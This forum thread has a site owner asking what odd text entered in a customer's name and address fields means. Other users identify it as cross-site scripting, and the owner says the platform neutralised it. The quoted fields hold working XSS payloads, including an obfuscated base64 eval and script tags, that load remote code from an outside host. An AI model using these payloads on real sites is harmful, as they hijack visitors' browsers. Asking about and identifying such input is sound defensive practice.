nuffsaid Posted January 15, 2021 Share Posted January 15, 2021 Hello I received a signup this morning where a customer placed this code on the name and address fields Has anyone experienced this and what is this person trying to achieve or has achieved ? Name: Linda'"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZ3oucWEveSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus> Juan"><sCRiPt sRC=//gz.qa/y></sCrIpT> Email: <<redacted>> Company: Address 1: 444 Rollins St"><sCRiPt sRC=//gz.qa/y></sCrIpT> Address 2: '"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZ3oucWEveSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus> City: Pretoria State: Pretoria Postcode: 0083 Country: ZA 0 Quote Link to comment Share on other sites More sharing options...
brian! Posted January 15, 2021 Share Posted January 15, 2021 28 minutes ago, nuffsaid said: Has anyone experienced this and what is this person trying to achieve or has achieved ? do a Google search on XSS - cross site scripting. 0 Quote Link to comment Share on other sites More sharing options...
nuffsaid Posted January 15, 2021 Author Share Posted January 15, 2021 Thanks , did a search and i now understand how that works. Also after inquiring it turns out WHMCS sanitizes the input on the registration form, so the code is displayed rather than executed Everything is alright. 0 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.